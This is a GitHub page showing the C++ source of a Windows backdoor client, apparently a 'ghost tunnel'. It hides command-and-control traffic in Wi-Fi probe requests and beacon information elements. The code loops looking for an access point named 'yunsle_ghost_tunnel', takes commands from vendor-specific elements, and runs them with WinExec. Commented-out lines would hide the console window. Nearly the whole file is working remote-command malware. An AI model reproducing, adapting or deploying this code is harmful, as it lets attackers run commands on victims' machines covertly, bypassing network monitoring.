-
Notifications
You must be signed in to change notification settings - Fork 5
/
windows_client.cpp
331 lines (282 loc) · 8.81 KB
/
windows_client.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <wlanapi.h>
#include <objbase.h>
#include <wtypes.h>
#include <stdio.h>
#include <stdlib.h>
// Need to link with Wlanapi.lib and Ole32.lib
#pragma comment(lib, "wlanapi.lib")
#pragma comment(lib, "ole32.lib")
//payload数据结构
struct ie_data
{
unsigned char id;
unsigned char len;
unsigned char val[1];
};
int wmain()
{
//HWND hwnd;
//hwnd = FindWindow(L"ConsoleWindowClass", NULL); //处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。
//if (hwnd)
//{
// ShowWindow(hwnd, SW_HIDE); //设置指定窗口的显示状态
//}
// Declare and initialize variables.
char hash[9] = { '\0' }; //防止命令重复执行的hash
HANDLE hClient = NULL;
DWORD dwMaxClient = 2; //
DWORD dwCurVersion = 0;
DWORD dwResult = 0;
int iRet = 0;
WCHAR GuidString[40] = { 0 };
int i;
/* variables used for WlanEnumInterfaces */
PWLAN_INTERFACE_INFO_LIST pIfList = NULL;
PWLAN_INTERFACE_INFO pIfInfo = NULL;
//AVAILABLE属性
PWLAN_AVAILABLE_NETWORK_LIST pBssList = NULL;
PWLAN_AVAILABLE_NETWORK pBssEntry = NULL;
//添加的Bss属性
//PWLAN_BSS_ENTRY bss_entry = NULL;
int iRSSI = 0;
//封装payload
struct ie_data *piedata = NULL;
int response_len = 0;
char *response = NULL;
//yunsle定义len和buf
int len = 18;
char *buf = "command ok!!!!!!.";
response_len = sizeof(WLAN_RAW_DATA) - 1 + sizeof(struct ie_data) - 1 + len;
response = (char *)malloc(response_len);
memset(response, '\0', response_len);
//yunsle定义pwlan_data的类型为PWLAN_RAW_DATA
PWLAN_RAW_DATA pwlan_data = (PWLAN_RAW_DATA)response;
pwlan_data->dwDataSize = sizeof(struct ie_data) - 1 + len;
piedata = (struct ie_data *)&pwlan_data->DataBlob[0];
piedata->id = (char)221;
piedata->len = len;
//buf为要发送的数据(最大长度240),len为数据长度
memcpy(&piedata->val[0], buf, len);
//循环接收命令
while (true) {
//打开wlan句柄
dwResult = WlanOpenHandle(dwMaxClient, NULL, &dwCurVersion, &hClient);
if (dwResult != ERROR_SUCCESS) {
wprintf(L"WlanOpenHandle failed with error: %u\n", dwResult);
// FormatMessage can be used to find out why the function failed
return 1;
}
//枚举wlan设备
dwResult = WlanEnumInterfaces(hClient, NULL, &pIfList);
if (dwResult != ERROR_SUCCESS) {
wprintf(L"WlanEnumInterfaces failed with error: %u\n", dwResult);
// FormatMessage can be used to find out why the function failed
return 1;
}
else {
wprintf(L"Num Entries: %lu\n", pIfList->dwNumberOfItems);
wprintf(L"Current Index: %lu\n", pIfList->dwIndex);
for (i = 0; i < (int)pIfList->dwNumberOfItems; i++) {
pIfInfo = (WLAN_INTERFACE_INFO *)&pIfList->InterfaceInfo[i];
wprintf(L" Interface Index[%d]:\t %lu\n", i, i);
iRet = StringFromGUID2(pIfInfo->InterfaceGuid, (LPOLESTR)&GuidString, 39);
// For c rather than C++ source code, the above line needs to be
// iRet = StringFromGUID2(&pIfInfo->InterfaceGuid, (LPOLESTR) &GuidString, 39);
if (iRet == 0)
wprintf(L"StringFromGUID2 failed\n");
else {
wprintf(L" InterfaceGUID[%d]: %ws\n", i, GuidString);
}
wprintf(L" Interface Description[%d]: %ws", i,
pIfInfo->strInterfaceDescription);
wprintf(L"\n");
wprintf(L" Interface State[%d]:\t ", i);
switch (pIfInfo->isState) {
case wlan_interface_state_not_ready:
wprintf(L"Not ready\n");
break;
case wlan_interface_state_connected:
wprintf(L"Connected\n");
break;
case wlan_interface_state_ad_hoc_network_formed:
wprintf(L"First node in a ad hoc network\n");
break;
case wlan_interface_state_disconnecting:
wprintf(L"Disconnecting\n");
break;
case wlan_interface_state_disconnected:
wprintf(L"Not connected\n");
break;
case wlan_interface_state_associating:
wprintf(L"Attempting to associate with a network\n");
break;
case wlan_interface_state_discovering:
wprintf(L"Auto configuration is discovering settings for the network\n");
break;
case wlan_interface_state_authenticating:
wprintf(L"In process of authenticating\n");
break;
default:
wprintf(L"Unknown state %ld\n", pIfInfo->isState);
break;
}
wprintf(L"\n");
}
}
//发送payload——————start
/*DWORD WINAPI WlanScan(
_In_ HANDLE hClientHandle,
_In_ const GUID *pInterfaceGuid,
_In_opt_ const PDOT11_SSID pDot11Ssid,
_In_opt_ const PWLAN_RAW_DATA pIeData,
_Reserved_ PVOID pReserved
);*/
/*
typedef struct _DOT11_SSID {
ULONG uSSIDLength;
UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
} DOT11_SSID, *PDOT11_SSID;
*/
PDOT11_SSID pdo = new DOT11_SSID;
pdo->uSSIDLength = 19;
UCHAR *ucp = NULL;
ucp = (UCHAR *)&pdo->ucSSID;
ucp = (UCHAR *)malloc(pdo->uSSIDLength);
memset(ucp, '\0', pdo->uSSIDLength);
strcpy((char*)ucp, "yunsle_ghost_tunnel");
dwResult = WlanScan(hClient, &pIfInfo->InterfaceGuid, NULL, pwlan_data, NULL);
if (dwResult != ERROR_SUCCESS) {
wprintf(L"WlanScan failed with error: %u\n", dwResult);
return 1;
}
else {
printf("已发送上线请求!!\n");
}
//发送payload——————end
free(pdo);
//获取可用AP
dwResult = WlanGetAvailableNetworkList(hClient,
&pIfInfo->InterfaceGuid,
0,
NULL,
&pBssList);
if (dwResult != ERROR_SUCCESS) {
wprintf(L"WlanGetAvailableNetworkList failed with error: %u\n",
dwResult);
//dwRetVal = 1;
// You can use FormatMessage to find out why the function failed
}
else {
//wprintf(L"WLAN_AVAILABLE_NETWORK_LIST for this interface\n");
//wprintf(L" Num Entries: %lu\n\n", pBssList->dwNumberOfItems);
//这里如果j从0开始,会有重复SSID项,原因不明,但不是引起多次执行命令的原因
for (int j = (pBssList->dwNumberOfItems) / 2; j < pBssList->dwNumberOfItems; j++) {
pBssEntry =
(WLAN_AVAILABLE_NETWORK *)& pBssList->Network[j];
//wprintf(L" 测试输出: %lu\n\n", pBssEntry->dot11BssType);
//获得BSS的LIST
//为了接收Probe Response帧,并解析出指令代码
PWLAN_BSS_LIST ppWlanBssList;
DWORD dwResult2 = WlanGetNetworkBssList(hClient, &pIfInfo->InterfaceGuid,
&pBssEntry->dot11Ssid,
pBssEntry->dot11BssType,
pBssEntry->bSecurityEnabled,
NULL,
&ppWlanBssList);
//错误处理
if (dwResult2 != ERROR_SUCCESS) {
wprintf(L"WlanGetNetworkBssList failed with error: %u\n",
dwResult2);
}
if (pBssEntry->dot11Ssid.uSSIDLength == 0)
//wprintf(L"\n");
break;
else {
//循环遍历AVAILABLE的BSSLisst数据
for (int z = 0; z < ppWlanBssList->dwNumberOfItems; z++)
{
WLAN_BSS_ENTRY *bss_entry = &ppWlanBssList->wlanBssEntries[z];
//添加判断是否是yunsle
if (stricmp((char *)bss_entry->dot11Ssid.ucSSID, "yunsle_ghost_tunnel") == 0) {
printf("找到控制端!\n");
char *pp = (char *)((unsigned long)bss_entry + bss_entry->ulIeOffset);
int total_size = bss_entry->ulIeSize;
printf("bss_entry:%s \n", pp);
printf("size:%d \n", sizeof(pp));
//getchar();
//printf("长度:%d",total_size);
for (;;) {
ie_data * ie = (struct ie_data *)pp;
//printf("ie:%s \n", pp);
//printf("id:%s \n", ie->id);cmd
//printf("len:%d \n", ie->len);
//printf("var:%s \n", ie->val);
//getchar();
printf("ie->id: %d", ie->id);
printf("ie->id: %d", ie->len);
//printf("ie->id: %s", ie->val[0]);
//getchar();
if ((int)ie->id == 221)
{
printf("221!!!!!\n");
//getchar();
// eg. "ccccmd /c notepad"
char *magic = (char *)&ie->val[0];
printf(magic);
printf("\n");
if (strncmp(magic, "ccc", 3) == 0)
{
char command[240] = { 0 };
char hash_tmp[9] = { '\0' }; //存放hash值
strncpy(hash_tmp, magic + 3, 8);//从数据帧拿到hash值赋值
if (strncmp(hash, hash_tmp, 8) == 0) {
//命令已经执行过,break
break;
}
else {
//命令未重复执行,写入hash
strncpy(hash, hash_tmp, 8);
}
strncpy(command, magic + 11, ie->len - 11);
//执行命令
printf("哈希值:%s\n", hash);
printf("提取命令:%s\n",command);
WinExec(command, SW_NORMAL);
//getchar();
//exit(1); //退出
break;
}
}
pp += sizeof(struct ie_data) - 1 + (int)ie->len;
//printf("pp:%s \n", pp);
total_size -= sizeof(struct ie_data) - 1 + (int)ie->len;
printf("total_size:%d \n", total_size);
//getchar();
if (!total_size)
{
break; // over
}
}
}
}
// wprintf(L"\n");
}
}
}
//间隔
Sleep(4500);
}
if (pBssList != NULL) {
WlanFreeMemory(pBssList);
pBssList = NULL;
}
if (pIfList != NULL) {
WlanFreeMemory(pIfList);
pIfList = NULL;
}
return 0;
}